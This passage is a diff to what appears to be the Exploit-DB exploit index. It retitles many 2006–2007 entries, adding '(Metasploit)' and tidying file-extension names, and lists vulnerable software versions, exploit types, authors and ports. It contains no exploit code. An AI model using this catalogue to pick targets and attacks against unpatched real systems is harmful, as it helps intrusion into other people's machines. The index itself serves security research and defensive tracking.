Auriemma",multiple,dos,0 -2074,platforms/windows/remote/2074.pm,"eIQnetworks License Manager Remote Buffer Overflow Exploit (1262)",2006-07-26,ri0t,windows,remote,10616 -2075,platforms/windows/remote/2075.pm,"eIQnetworks License Manager Remote Buffer Overflow Exploit (494)",2006-07-26,ri0t,windows,remote,0 +2074,platforms/windows/remote/2074.pm,"eIQnetworks License Manager - Remote Buffer Overflow Exploit (Metasploit)",2006-07-26,ri0t,windows,remote,10616 +2075,platforms/windows/remote/2075.pm,"eIQnetworks License Manager - Remote Buffer Overflow Exploit (Metasploit)",2006-07-26,ri0t,windows,remote,0 2076,platforms/windows/remote/2076.pl,"AIM Triton 1.0.4 - (SipXtapi) Remote Buffer Overflow Exploit (PoC)",2006-07-26,c0rrupt,windows,remote,5061 2077,platforms/php/webapps/2077.txt,"WMNews <= 0.2a (base_datapath) Remote Inclusion",2006-07-27,uNfz,php,webapps,0 2078,platforms/php/webapps/2078.txt,"a6mambohelpdesk Mambo Component <= 18RC1 Include",2006-07-27,Dr.Jr7,php,webapps,0 @@ -1835,7 +1835,7 @@ id,file,description,date,author,platform,type,port 2137,platforms/php/webapps/2137.txt,"QuestCMS (main.php) Remote File Include",2006-08-07,Crackers_Child,php,webapps,0 2138,platforms/asp/webapps/2138.txt,"YenerTurk Haber Script 1.0 - Remote SQL Injection",2006-08-07,ASIANEAGLE,asp,webapps,0 2139,platforms/php/webapps/2139.txt,"PHPCodeCabinet <= 0.5 - (Core.php) Remote File Include",2006-08-07,Minion,php,webapps,0 -2140,platforms/windows/remote/2140.pm,"eIQnetworks License Manager - Remote Buffer Overflow Exploit (multi) (2)",2006-08-07,ri0t,windows,remote,10616 +2140,platforms/windows/remote/2140.pm,"eIQnetworks License Manager - Remote Buffer Overflow Exploit (Metasploit) (2)",2006-08-07,ri0t,windows,remote,10616 2141,platforms/php/webapps/2141.txt,"Visual Events Calendar 1.1 - (cfg_dir) Remote Include",2006-08-07,"Mehmet Ince",php,webapps,0 2142,platforms/php/webapps/2142.txt,"ZoneX 1.0.3 Publishers Gold Edition Remote File Inclusion",2006-08-07,"Mehmet Ince",php,webapps,0 2143,platforms/php/webapps/2143.pl,"TWiki <= 4.0.4 - (configure) Remote Command Execution Exploit",2006-08-07,"Javier Olascoaga",php,webapps,0 @@ -1857,9 +1857,9 @@ id,file,description,date,author,platform,type,port 2159,platforms/php/webapps/2159.pl,"PHPMyRing <= 4.2.0 - (view_com.php) Remote SQL Injection Exploit",2006-08-09,simo64,php,webapps,0 2160,platforms/windows/dos/2160.c,"OpenMPT <= 1.17.02.43 - Multiple Remote Buffer Overflow Exploit PoC",2006-08-10,"Luigi Auriemma",windows,dos,0 2161,platforms/php/webapps/2161.pl,"SAPID CMS <= 1.2.3_rc3 - (rootpath) Remote Code Execution Exploit",2006-08-10,simo64,php,webapps,0 -2162,platforms/windows/remote/2162.pm,"Microsoft Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040)",2006-08-10,"H D Moore",windows,remote,445 +2162,platforms/windows/remote/2162.pm,"Microsoft Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) (Metasploit)",2006-08-10,"H D Moore",windows,remote,445 2163,platforms/php/webapps/2163.txt,"phpwcms <= 1.1-RC4 - (spaw) Remote File Include",2006-08-10,Morgan,php,webapps,0 -2164,platforms/windows/remote/2164.pm,"Microsoft Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014) (2)",2006-08-10,"H D Moore",windows,remote,0 +2164,platforms/windows/remote/2164.pm,"Microsoft Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014) (Metasploit) (2)",2006-08-10,"H D Moore",windows,remote,0 2165,platforms/php/webapps/2165.txt,"Spaminator <= 1.7 - (page) Remote File Include",2006-08-10,Drago84,php,webapps,0 2166,platforms/php/webapps/2166.txt,"Thatware <= 0.4.6 - (root_path) Remote File Include",2006-08-10,Drago84,php,webapps,0 2167,platforms/php/webapps/2167.txt,"SaveWebPortal <= 3.4 - (page) Remote File Inclusion",2006-08-10,Bl0od3r,php,webapps,0 @@ -1970,7 +1970,7 @@ id,file,description,date,author,platform,type,port 2273,platforms/php/webapps/2273.txt,"ExBB Italiano <= 0.2 - exbb[home_path] Remote File Include",2006-08-29,SHiKaA,php,webapps,0 2274,platforms/linux/remote/2274.c,"Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit",2006-08-29,Expanders,linux,remote,0 2275,platforms/php/webapps/2275.txt,"phpECard <= 2.1.4 - (functions.php) Remote File Include",2006-08-29,LeAk,php,webapps,0 -2276,platforms/windows/remote/2276.pm,"IBM eGatherer <= 3.20.0284.0 - (ActiveX) Remote Code Execution Exploit",2006-08-29,"Francisco Amato",windows,remote,0 +2276,platforms/windows/remote/2276.pm,"IBM eGatherer <= 3.20.0284.0 - (ActiveX) Remote Code Execution Exploit (Metasploit)",2006-08-29,"Francisco Amato",windows,remote,0 2277,platforms/windows/remote/2277.c,"Streamripper <= 1.61.25 - HTTP Header Parsing Buffer Overflow Exploit (2)",2006-08-29,psylocn,windows,remote,0 2278,platforms/windows/local/2278.cpp,"ZipCentral 4.01 - ZIP File Handling Local Buffer Overflow Exploit",2006-08-30,bratax,windows,local,0 2279,platforms/php/webapps/2279.txt,"phpAtm <= 1.21 - (include_location) Remote File Include Vulnerabilities",2006-08-30,KinSize,php,webapps,0 @@ -2049,7 +2049,7 @@ id,file,description,date,author,platform,type,port 2352,platforms/php/webapps/2352.txt,"webSPELL <= 4.01.01 Database Backup Download",2006-09-12,Trex,php,webapps,0 2353,platforms/php/webapps/2353.txt,"Vitrax Pre-modded <= 1.0.6-r3 - Remote File Include",2006-09-12,CeNGiZ-HaN,php,webapps,0 2354,platforms/php/webapps/2354.txt,"Signkorn Guestbook <= 1.3 - (dir_path) Remote File Include",2006-09-12,SHiKaA,php,webapps,0 -2355,platforms/windows/remote/2355.pm,"Microsoft Windows 2003 - NetpIsRemote() Remote Overflow Exploit (MS06-040)",2006-09-13,"Trirat Puttaraksa",windows,remote,445 +2355,platforms/windows/remote/2355.pm,"Microsoft Windows 2003 - NetpIsRemote() Remote Overflow Exploit (MS06-040) (Metasploit)",2006-09-13,"Trirat Puttaraksa",windows,remote,445 2356,platforms/php/webapps/2356.txt,"Quicksilver Forums <= 1.2.1 - (set) Remote File Include",2006-09-13,mdx,php,webapps,0 2357,platforms/php/webapps/2357.txt,"phpunity.postcard (gallery_path) Remote File Include",2006-09-13,Rivertam,php,webapps,0 2358,platforms/windows/remote/2358.c,"Microsoft Internet Explorer COM Object Remote Heap Overflow Exploit",2006-09-13,nop,windows,remote,0 @@ -2133,7 +2133,7 @@ id,file,description,date,author,platform,type,port 2437,platforms/php/webapps/2437.php,"paBugs <= 2.0 Beta 3 - (class.mysql.php) Remote File Include Exploit",2006-09-26,Kacper,php,webapps,0 2438,platforms/php/webapps/2438.txt,"Kietu? <= 4.0.0b2 - (hit.php) Remote File Include",2006-09-26,D_7J,php,webapps,0 2439,platforms/php/webapps/2439.txt,"Newswriter SW <= 1.42 - (editfunc.inc.php) File Include",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0 -2440,platforms/windows/remote/2440.rb,"Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow Exploit",2006-09-27,"H D Moore",windows,remote,0 +2440,platforms/windows/remote/2440.rb,"Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow Exploit (Metasploit)",2006-09-27,"H D Moore",windows,remote,0 2441,platforms/php/webapps/2441.pl,"Blog Pixel Motion 2.1.1 PHP Code Execution / Create Admin Exploit",2006-09-27,DarkFig,php,webapps,0 2442,platforms/php/webapps/2442.txt,"A-Blog 2.0 - Multiple Remote File Include Vulnerabilities",2006-09-27,v1per-haCker,php,webapps,0 2443,platforms/php/webapps/2443.txt,"Newswriter SW 1.4.2 - (main.inc.php) Remote File Include Exploit",2006-09-27,"Mehmet Ince",php,webapps,0 @@ -2160,7 +2160,7 @@ id,file,description,date,author,platform,type,port 2464,platforms/osx/local/2464.pl,"Mac OS X <= 10.4.7 - Mach Exception Handling Local Exploit (10.3.x) (0Day)",2006-09-30,"Kevin Finisterre",osx,local,0 2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 - (BSX_LIBDIR) Remote File Include Exploit",2006-10-01,Kacper,php,webapps,0 2466,platforms/linux/local/2466.pl,"cPanel <= 10.8.x - (cpwrap via mysqladmin) Local Root Exploit",2006-10-01,"Clint Torrez",linux,local,0 -2467,platforms/windows/remote/2467.pm,"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - (Source) Remote Exploit",2006-10-01,muts,windows,remote,81 +2467,platforms/windows/remote/2467.pm,"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - (Source) Remote Exploit (Metasploit)",2006-10-01,muts,windows,remote,81 2468,platforms/php/webapps/2468.txt,"BBaCE <= 3.5 - (includes/functions.php) Remote File Include",2006-10-02,SpiderZ,php,webapps,0 2469,platforms/php/webapps/2469.pl,"JAF CMS <= 4.0 RC1 - (forum.php) Remote File Include Exploit",2006-10-03,Kacper,php,webapps,0 2470,platforms/php/webapps/2470.txt,"phpMyProfiler <= 0.9.6 - Remote File Include",2006-10-03,mozi,php,webapps,0 @@ -2370,7 +2370,7 @@ id,file,description,date,author,platform,type,port 2677,platforms/php/webapps/2677.asp,"Netref 4 - (cat_for_aff.php) Source Code Disclosure Exploit",2006-10-29,ajann,php,webapps,0 2678,platforms/php/webapps/2678.txt,"Faq Administrator 2.1 - (faq_reply.php) Remote File Include",2006-10-29,v1per-haCker,php,webapps,0 2679,platforms/php/webapps/2679.txt,"PHPMyRing <= 4.2.1 - (cherche.php) Remote SQL Injection",2006-10-29,ajann,php,webapps,0 -2680,platforms/windows/remote/2680.pm,"PrivateWire Gateway 3.7 - Remote Buffer Overflow Exploit (Win32)",2006-10-29,"Michael Thumann",windows,remote,80 +2680,platforms/windows/remote/2680.pm,"PrivateWire Gateway 3.7 - Remote Buffer Overflow Exploit (Win32) (Metasploit)",2006-10-29,"Michael Thumann",windows,remote,80 2681,platforms/php/webapps/2681.txt,"QnECMS <= 2.5.6 - (adminfolderpath) Remote File Inclusion Exploit",2006-10-30,K-159,php,webapps,0 2682,platforms/windows/dos/2682.pl,"Microsoft Windows NAT Helper Components Remote DoS Exploit (perl)",2006-10-30,x82,windows,dos,0 2683,platforms/asp/webapps/2683.txt,"Techno Dreams Announcement (key) Remote SQL Injection",2006-10-30,ajann,asp,webapps,0 @@ -2390,7 +2390,7 @@ id,file,description,date,author,platform,type,port 2697,platforms/php/webapps/2697.php,"Innovate Portal <= 2.0 - (acp.php) Remote Code Execution Exploit",2006-11-01,Kacper,php,webapps,0 2698,platforms/php/webapps/2698.pl,"2BGal 3.0 - (admin/configuration.inc.php) Local Inclusion Exploit",2006-11-01,Kw3[R]Ln,php,webapps,0 2699,platforms/windows/remote/2699.c,"EFS Easy Address Book Web Server <= 1.2 - Remote File Stream Exploit",2006-11-01,"Greg Linares",windows,remote,0 -2700,platforms/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption Proof of Concept",2006-11-01,"H D Moore",hardware,dos,0 +2700,platforms/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption Proof of Concept (Metasploit)",2006-11-01,"H D Moore",hardware,dos,0 2701,platforms/php/webapps/2701.txt,"TikiWiki 1.9.5 Sirius (sort_mode) Information Disclosure",2006-11-01,securfrog,php,webapps,0 2702,platforms/php/webapps/2702.php,"Lithium CMS <= 4.04c (classes/index.php) Local File Include Exploit",2006-11-02,Kacper,php,webapps,0 2703,platforms/php/webapps/2703.txt,"Article System 0.6 - (volume.php) Remote File Include",2006-11-02,GregStar,php,webapps,0 @@ -2546,9 +2546,9 @@ id,file,description,date,author,platform,type,port 2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch (ActiveX Control) Command Execution Exploit",2006-11-30,"Tan Chew Keong",windows,remote,0 2867,platforms/php/webapps/2867.php,"PHPGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit",2006-11-30,rgod,php,webapps,0 2869,platforms/php/webapps/2869.php,"Serendipity <= 1.0.3 - (comment.php) Local File Include Exploit",2006-11-30,Kacper,php,webapps,0 -2870,platforms/windows/remote/2870.rb,"VUPlayer <= 2.44 - (.M3U UNC Name) Buffer Overflow Exploit (Metasploit)",2006-11-30,"Greg Linares",windows,remote,0 +2870,platforms/windows/remote/2870.rb,"VUPlayer 2.44 - (.m3u UNC Name) Buffer Overflow Exploit (Metasploit)",2006-11-30,"Greg Linares",windows,remote,0 2871,platforms/php/webapps/2871.txt,"LDU <= 8.x - (polls.php) Remote SQL Injection",2006-11-30,ajann,php,webapps,0 -2872,platforms/windows/local/2872.c,"VUPlayer <= 2.44 - (.M3U UNC Name) Buffer Overflow Exploit",2006-11-30,Expanders,windows,local,0 +2872,platforms/windows/local/2872.c,"VUPlayer 2.44 - (.m3u UNC Name) Buffer Overflow Exploit",2006-11-30,Expanders,windows,local,0 2873,platforms/windows/local/2873.c,"AtomixMP3 <= 2.3 - (.M3U) Buffer Overflow Exploit",2006-11-30,"Greg Linares",windows,local,0 2874,platforms/bsd/dos/2874.pl,"NetBSD FTPd / Tnftpd - Remote Stack Overflow PoC",2006-11-30,kingcope,bsd,dos,0 2876,platforms/php/webapps/2876.txt,"DZCP (deV!L_z Clanportal) <= 1.3.6 - Arbitrary File Upload",2006-12-01,"Tim Weber",php,webapps,0 @@ -2608,7 +2608,7 @@ id,file,description,date,author,platform,type,port 2931,platforms/php/webapps/2931.txt,"AR Memberscript (usercp_menu.php) Remote File Include",2006-12-14,ex0,php,webapps,0 2933,platforms/linux/remote/2933.c,"OpenLDAP <= 2.4.3 - (KBIND) Remote Buffer Overflow Exploit",2006-12-15,"Solar Eclipse",linux,remote,389 2934,platforms/windows/dos/2934.php,"Sambar FTP Server 6.4 - (SIZE) Remote Denial of Service Exploit",2006-12-15,rgod,windows,dos,0 -2935,platforms/windows/dos/2935.sh,"Windows Media Player 9/10 - (MID File) Denial of Service Exploit",2006-12-15,sehato,windows,dos,0 +2935,platforms/windows/dos/2935.sh,"Windows Media Player 9/10 - (.MID) Denial of Service Exploit",2006-12-15,sehato,windows,dos,0 2936,platforms/linux/remote/2936.pl,"GNU InetUtils ftpd 1.4.2 - (ld.so.preload) Remote Root Exploit",2006-12-15,kingcope,linux,remote,21 2937,platforms/php/webapps/2937.php,"extreme-fusion <= 4.02 - Remote Code Execution Exploit",2006-12-16,Kacper,php,webapps,0 2938,platforms/php/webapps/2938.htm,"Bandwebsite <= 1.5 - (Login) Remote Add Admin Exploit",2006-12-16,H0tTurk-,php,webapps,0 @@ -2764,7 +2764,7 @@ id,file,description,date,author,platform,type,port 3089,platforms/asp/webapps/3089.txt,"QUOTE&ORDERING SYSTEM 1.0 - (ordernum) Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0 3090,platforms/php/webapps/3090.txt,"NUNE News Script 2.0pre2 - Multiple Remote File Include Vulnerabilities",2007-01-06,"Mehmet Ince",php,webapps,0 3091,platforms/php/webapps/3091.php,"L2J Statistik Script <= 0.09 - (index.php page) Local File Include Exploit",2007-01-07,Codebreak,php,webapps,0 -3092,platforms/windows/remote/3092.pm,"NaviCOPA Web Server 2.01 - (GET) Remote Buffer Overflow Exploit",2007-01-07,"Jacopo Cervini",windows,remote,80 +3092,platforms/windows/remote/3092.pm,"NaviCOPA Web Server 2.01 - (GET) Remote Buffer Overflow Exploit (Metasploit)",2007-01-07,"Jacopo Cervini",windows,remote,80 3093,platforms/php/webapps/3093.txt,"AllMyGuests <= 0.3.0 - (AMG_serverpath) Remote Inclusion Vulnerabilities",2007-01-07,beks,php,webapps,0 3094,platforms/bsd/local/3094.c,"OpenBSD 3.x - 4.0 vga_ioctl() Local Root Exploit",2007-01-07,"Critical Security",bsd,local,0 3095,platforms/php/webapps/3095.py,"WordPress 2.0.5 - Trackback UTF-7 Remote SQL Injection Exploit",2007-01-07,"Stefan Esser",php,webapps,0 @@ -2820,7 +2820,7 @@ id,file,description,date,author,platform,type,port 3147,platforms/php/webapps/3147.txt,"Uberghey 0.3.1 - (frontpage.php) Remote File Include",2007-01-17,GoLd_M,php,webapps,0 3148,platforms/windows/remote/3148.pl,"Microsoft Internet Explorer - VML Download and Execute Exploit (MS07-004)",2007-01-17,pang0,windows,remote,0 3149,platforms/windows/local/3149.cpp,"Microsoft Help Workshop 4.03.0002 - (.CNT) Buffer Overflow Exploit",2007-01-17,porkythepig,windows,local,0 -3150,platforms/php/webapps/3150.txt,"Oreon <= 1.2.3 RC4 - (lang/index.php file) Remote Inclusion",2007-01-17,3l3ctric-Cracker,php,webapps,0 +3150,platforms/php/webapps/3150.txt,"Oreon <= 1.2.3 RC4 - (lang/index.php) Remote Inclusion",2007-01-17,3l3ctric-Cracker,php,webapps,0 3151,platforms/osx/dos/3151.rb,"Mac OS X 10.4.8 SLP Daemon Service Registration Buffer Overflow PoC",2007-01-18,MoAB,osx,dos,0 3152,platforms/php/webapps/3152.txt,"ComVironment 4.0 - (grab_globals.lib.php) Remote File Include",2007-01-18,GoLd_M,php,webapps,0 3153,platforms/php/webapps/3153.php,"phpBP <= RC3 - (2.204) (SQL/cmd) Remote Code Execution Exploit",2007-01-18,Kacper,php,webapps,0 @@ -3104,7 +3104,7 @@ id,file,description,date,author,platform,type,port 3435,platforms/php/webapps/3435.txt,"netForo! 0.1 - (down.php file_to_download) Remote File Disclosure",2007-03-08,GoLd_M,php,webapps,0 3436,platforms/php/webapps/3436.txt,"WEBO (Web Organizer) <= 1.0 - (baseDir) Remote File Inclusion",2007-03-08,K-159,php,webapps,0 3437,platforms/asp/webapps/3437.txt,"GaziYapBoz Game Portal - (kategori.asp) Remote SQL Injection",2007-03-08,CyberGhost,asp,webapps,0 -3438,platforms/php/webapps/3438.txt,"Magic CMS 4.2.747 - (mysave.php file) Remote File Include",2007-03-08,DNX,php,webapps,0 +3438,platforms/php/webapps/3438.txt,"Magic CMS 4.2.747 - (mysave.php) Remote File Include",2007-03-08,DNX,php,webapps,0 3439,platforms/windows/local/3439.php,"PHP 4.4.6 snmpget() object id Local Buffer Overflow Exploit PoC",2007-03-09,rgod,windows,local,0 3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP <= 1.8.3 - zip:// URL Wrapper BoF Exploit",2007-03-09,"Stefan Esser",linux,local,0 3441,platforms/linux/dos/3441.c,"Linux Omnikey Cardman 4040 Driver - Local Buffer Overflow Exploit PoC",2007-03-09,"Daniel Roethlisberger",linux,dos,0 @@ -3147,7 +3147,7 @@ id,file,description,date,author,platform,type,port 3481,platforms/asp/webapps/3481.htm,"Orion-Blog 2.0 - (AdminBlogNewsEdit.asp) Remote Auth Bypass",2007-03-15,WiLdBoY,asp,webapps,0 3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 - (USER) Remote Buffer Overflow SEH Overflow Exploit",2007-03-15,"Umesh Wanve",windows,remote,21 3483,platforms/php/webapps/3483.pl,"Woltlab Burning Board 2.x - (usergroups.php) Remote SQL Injection Exploit",2007-03-15,x666,php,webapps,0 -3484,platforms/php/webapps/3484.txt,"WebLog (index.php file) Remote File Disclosure",2007-03-15,Dj7xpl,php,webapps,0 +3484,platforms/php/webapps/3484.txt,"WebLog (index.php) Remote File Disclosure",2007-03-15,Dj7xpl,php,webapps,0 3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 - (INCLUDE_PATH) RFI",2007-03-15,the_day,php,webapps,0 3486,platforms/php/webapps/3486.txt,"Groupit 2.00b5 - (c_basepath) Remote File Inclusion",2007-03-15,the_day,php,webapps,0 3487,platforms/php/webapps/3487.pl,"CcMail 1.0.1 - (update.php functions_dir) Remote File Inclusion Exploit",2007-03-15,Crackers_Child,php,webapps,0 @@ -3352,7 +3352,7 @@ id,file,description,date,author,platform,type,port 3693,platforms/windows/dos/3693.txt,"Microsoft Windows - (.hlp) Local HEAP Overflow PoC (0Day)",2007-04-09,muts,windows,dos,0 3694,platforms/php/webapps/3694.txt,"PHP121 Instant Messenger 2.2 - Local File Inclusion",2007-04-09,Dj7xpl,php,webapps,0 3695,platforms/windows/local/3695.c,"Microsoft Windows - Animated Cursor (.ANI) Local Overflow Exploit",2007-04-09,"Breno Silva Pinto",windows,local,0 -3696,platforms/php/webapps/3696.txt,"Pathos CMS 0.92-2 - (warn.php file) Remote File Inclusion",2007-04-09,kezzap66345,php,webapps,0 +3696,platforms/php/webapps/3696.txt,"Pathos CMS 0.92-2 - (warn.php) Remote File Inclusion",2007-04-09,kezzap66345,php,webapps,0 3697,platforms/php/webapps/3697.txt,"HIOX GUEST BOOK (HGB) 4.0 - Remote Code Execution",2007-04-10,Dj7xpl,php,webapps,0 3698,platforms/linux/remote/3698.txt,"Kerberos 1.5.1 Kadmind Remote Root Buffer Overflow",2007-04-10,c0ntex,linux,remote,0 3699,platforms/php/webapps/3699.txt,"phpGalleryScript 1.0 - (init.gallery.php include_class) RFI",2007-04-10,anonymous,php,webapps,0 @@ -3419,11 +3419,11 @@ id,file,description,date,author,platform,type,port 3761,platforms/php/webapps/3761.txt,"Mozzers SubSystem final (subs.php) Remote Code Execution",2007-04-18,Dj7xpl,php,webapps,0 3762,platforms/php/webapps/3762.htm,"AimStats 3.2 - (process.php update) Remote Code Execution Exploit",2007-04-18,Dj7xpl,php,webapps,0 3763,platforms/php/webapps/3763.txt,"Rezervi 0.9 - (root) Remote File Inclusion Vulnerabilities",2007-04-18,GoLd_M,php,webapps,0 -3764,platforms/php/webapps/3764.txt,"Zomplog 3.8 - (force_download.php file) Remote File Disclosure",2007-04-18,Dj7xpl,php,webapps,0 +3764,platforms/php/webapps/3764.txt,"Zomplog 3.8 - (force_download.php) Remote File Disclosure",2007-04-18,Dj7xpl,php,webapps,0 3765,platforms/php/webapps/3765.txt,"opensurveypilot <= 1.2.1 - Remote File Inclusion",2007-04-18,"Alkomandoz Hacker",php,webapps,0 3766,platforms/php/webapps/3766.txt,"Mx Module Smartor Album FAP 2.0 RC 1 - Remote File Inclusion",2007-04-19,bd0rk,php,webapps,0 3767,platforms/asp/webapps/3767.txt,"CreaDirectory 1.2 - (error.asp id) Remote SQL Injection",2007-04-19,CyberGhost,asp,webapps,0 -3768,platforms/windows/dos/3768.pl,"Winamp <= 5.3 - (WMV File) Remote Denial of Service Exploit",2007-04-19,WiLdBoY,windows,dos,0 +3768,platforms/windows/dos/3768.pl,"Winamp <= 5.3 - (.WMV) Remote Denial of Service Exploit",2007-04-19,WiLdBoY,windows,dos,0 3769,platforms/linux/dos/3769.c,"eXtremail <= 2.1.1 DNS Parsing Bugs Remote Exploit PoC",2007-04-20,mu-b,linux,dos,0 3770,platforms/windows/dos/3770.pl,"Foxit Reader 2.0 - (PDF) Remote Denial of Service Exploit",2007-04-20,n00b,windows,dos,0 3771,platforms/php/webapps/3771.txt,"Supasite 1.23b - Multiple Remote File Inclusion Vulnerabilities",2007-04-21,GoLd_M,php,webapps,0 @@ -3439,7 +3439,7 @@ id,file,description,date,author,platform,type,port 3781,platforms/php/webapps/3781.txt,"Joomla 1.5.0 Beta (pcltar.php) Remote File Inclusion",2007-04-23,Omid,php,webapps,0 3782,platforms/windows/dos/3782.pl,"Winamp <= 5.33 - (.AVI) Remote Denial of Service Exploit",2007-04-23,DeltahackingTEAM,windows,dos,0 3783,platforms/php/webapps/3783.txt,"Pagode 0.5.8 - (navigator_ok.php asolute) Remote File Disclosure",2007-04-23,GoLd_M,php,webapps,0 -3784,platforms/multiple/dos/3784.c,"Opera 9.2 - (torrent File) Remote Denial of Service Exploit",2007-04-23,n00b,multiple,dos,0 +3784,platforms/multiple/dos/3784.c,"Opera 9.2 - (.torrent) Remote Denial of Service Exploit",2007-04-23,n00b,multiple,dos,0 3785,platforms/php/webapps/3785.txt,"Post Revolution <= 0.7.0 RC 2 - (dir) Remote File Inclusion",2007-04-23,InyeXion,php,webapps,0 3786,platforms/php/webapps/3786.txt,"GPB Bulletin Board Multiple Remote File Inclusion Vulnerabilities",2007-04-24,"ThE TiGeR",php,webapps,0 3787,platforms/linux/remote/3787.c,"GNU Mailutils imap4d 0.6 - Remote Format String Exploit (exec-shield)",2007-04-24,Xpl017Elz,linux,remote,143 @@ -3454,7 +3454,7 @@ id,file,description,date,author,platform,type,port 3796,platforms/php/webapps/3796.htm,"wavewoo 0.1.1 - (loading.php path_include) Remote File Inclusion Exploit",2007-04-24,kezzap66345,php,webapps,0 3797,platforms/windows/local/3797.c,"ABC-View Manager 1.42 - (.PSP) Buffer Overflow Exploit",2007-04-25,Marsu,windows,local,0 3798,platforms/windows/local/3798.c,"FreshView 7.15 - (.PSP) Buffer Overflow Exploit",2007-04-25,Marsu,windows,local,0 -3799,platforms/php/webapps/3799.txt,"JulmaCMS 1.4 - (file.php file) Remote File Disclosure",2007-04-25,GoLd_M,php,webapps,0 +3799,platforms/php/webapps/3799.txt,"JulmaCMS 1.4 - (file.php) Remote File Disclosure",2007-04-25,GoLd_M,php,webapps,0 3800,platforms/php/webapps/3800.txt,"Ext 1.0 - (feed-proxy.php feed) Remote File Disclosure",2007-04-25,"Alkomandoz Hacker",php,webapps,0 3801,platforms/windows/local/3801.c,"Gimp 2.2.14 - (.ras) SUNRAS Plugin Buffer Overflow Exploit",2007-04-26,Marsu,windows,local,0 3802,platforms/php/webapps/3802.txt,"phpBandManager 0.8 - (index.php pg) Remote File Inclusion",2007-04-26,koray,php,webapps,0 @@ -3486,7 +3486,7 @@ id,file,description,date,author,platform,type,port 3828,platforms/php/webapps/3828.txt,"WordPress Plugin myflash <= 1.00 - (wppath) RFI",2007-05-01,Crackers_Child,php,webapps,0 3829,platforms/linux/remote/3829.c,"3proxy 0.5.3g - proxy.c logurl() Remote Overflow Exploit (exec-shield)",2007-05-02,Xpl017Elz,linux,remote,0 3830,platforms/windows/dos/3830.html,"Excel Viewer OCX 3.1.0.6 - Multiple Methods Denial of Service Exploit",2007-05-02,shinnai,windows,dos,0 -3831,platforms/asp/webapps/3831.txt,"PStruh-CZ 1.3/1.5 - (download.asp File) File Disclosure",2007-05-02,Dj7xpl,asp,webapps,0 +3831,platforms/asp/webapps/3831.txt,"PStruh-CZ 1.3/1.5 - (download.asp) File Disclosure",2007-05-02,Dj7xpl,asp,webapps,0 3832,platforms/php/webapps/3832.txt,"1024 CMS 0.7 - (download.php item) Remote File Disclosure",2007-05-02,Dj7xpl,php,webapps,0 3833,platforms/php/webapps/3833.pl,"mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion Exploit",2007-05-02,bd0rk,php,webapps,0 3834,platforms/php/webapps/3834.php,"YaPIG 0.95b Remote Code Execution Exploit",2007-05-02,Dj7xpl,php,webapps,0 @@ -4000,8 +4000,8 @@ id,file,description,date,author,platform,type,port 4351,platforms/windows/remote/4351.html,"Yahoo! Messenger (YVerInfo.dll <= 2007.8.27.1) ActiveX BoF Exploit",2007-09-01,minhbq,windows,remote,0 4352,platforms/php/webapps/4352.txt,"Weblogicnet - (files_dir) Multiple Remote File Inclusion Vulnerabilities",2007-09-02,bius,php,webapps,0 4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 - (error_view.php ID) Remote SQL Injection",2007-09-02,k1tk4t,php,webapps,0 -4354,platforms/windows/local/4354.py,"Virtual DJ 5.0 - (m3u File) Local Buffer OverFlow Exploit",2007-09-02,0x58,windows,local,0 -4355,platforms/windows/local/4355.php,"OTSTurntables 1.00 - (m3u File) Local Buffer Overflow Exploit",2007-09-02,0x58,windows,local,0 +4354,platforms/windows/local/4354.py,"Virtual DJ 5.0 - (.m3u) Local Buffer OverFlow Exploit",2007-09-02,0x58,windows,local,0 +4355,platforms/windows/local/4355.php,"OTSTurntables 1.00 - (.m3u) Local Buffer Overflow Exploit",2007-09-02,0x58,windows,local,0 4356,platforms/php/webapps/4356.txt,"eNetman 20050830 - (index.php page) Remote File Inclusion",2007-09-03,JaheeM,php,webapps,0 4357,platforms/windows/remote/4357.html,"Telecom Italy Alice Messenger Remote registry key manipulation Exploit",2007-09-03,rgod,windows,remote,0 4358,platforms/php/webapps/4358.txt,"STPHPLibrary (STPHPLIB_DIR) Remote File Inclusion",2007-09-03,leetsecurity,php,webapps,0 @@ -4010,7 +4010,7 @@ id,file,description,date,author,platform,type,port 4361,platforms/windows/local/4361.pl,"Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec Exploit",2007-09-04,Koshi,windows,local,0 4362,platforms/linux/remote/4362.pl,"Web Oddity Web Server 0.09b - Directory Transversal Exploit",2007-09-04,Katatafish,linux,remote,0 4363,platforms/php/webapps/4363.txt,"PHPOF <= 20040226 - (DB_adodb.class.php) RFI",2007-09-04,"ThE TiGeR",php,webapps,0 -4364,platforms/windows/local/4364.php,"AtomixMP3 2.3 - (pls File) Local Buffer OverFlow Exploit",2007-09-05,0x58,windows,local,0 +4364,platforms/windows/local/4364.php,"AtomixMP3 2.3 - (.pls) Local Buffer OverFlow Exploit",2007-09-05,0x58,windows,local,0 4365,platforms/php/webapps/4365.txt,"AnyInventory <= 2.0 - (environment.php) Remote File Inclusion",2007-09-05,"ThE TiGeR",php,webapps,0 4366,platforms/windows/remote/4366.html,"GlobalLink 2.7.0.8 glItemCom.dll SetInfo() Heap Overflow Exploit",2007-09-05,void,windows,remote,0 4367,platforms/windows/remote/4367.c,"Trend Micro ServerProtect eng50.dll - Remote Stack Overflow Exploit",2007-09-06,devcode,windows,remote,0 @@ -4093,7 +4093,7 @@ id,file,description,date,author,platform,type,port 4445,platforms/windows/remote/4445.html,"EasyMail MessagePrinter Object (emprint.DLL 6.0.1.0) BoF Exploit",2007-09-23,rgod,windows,remote,0 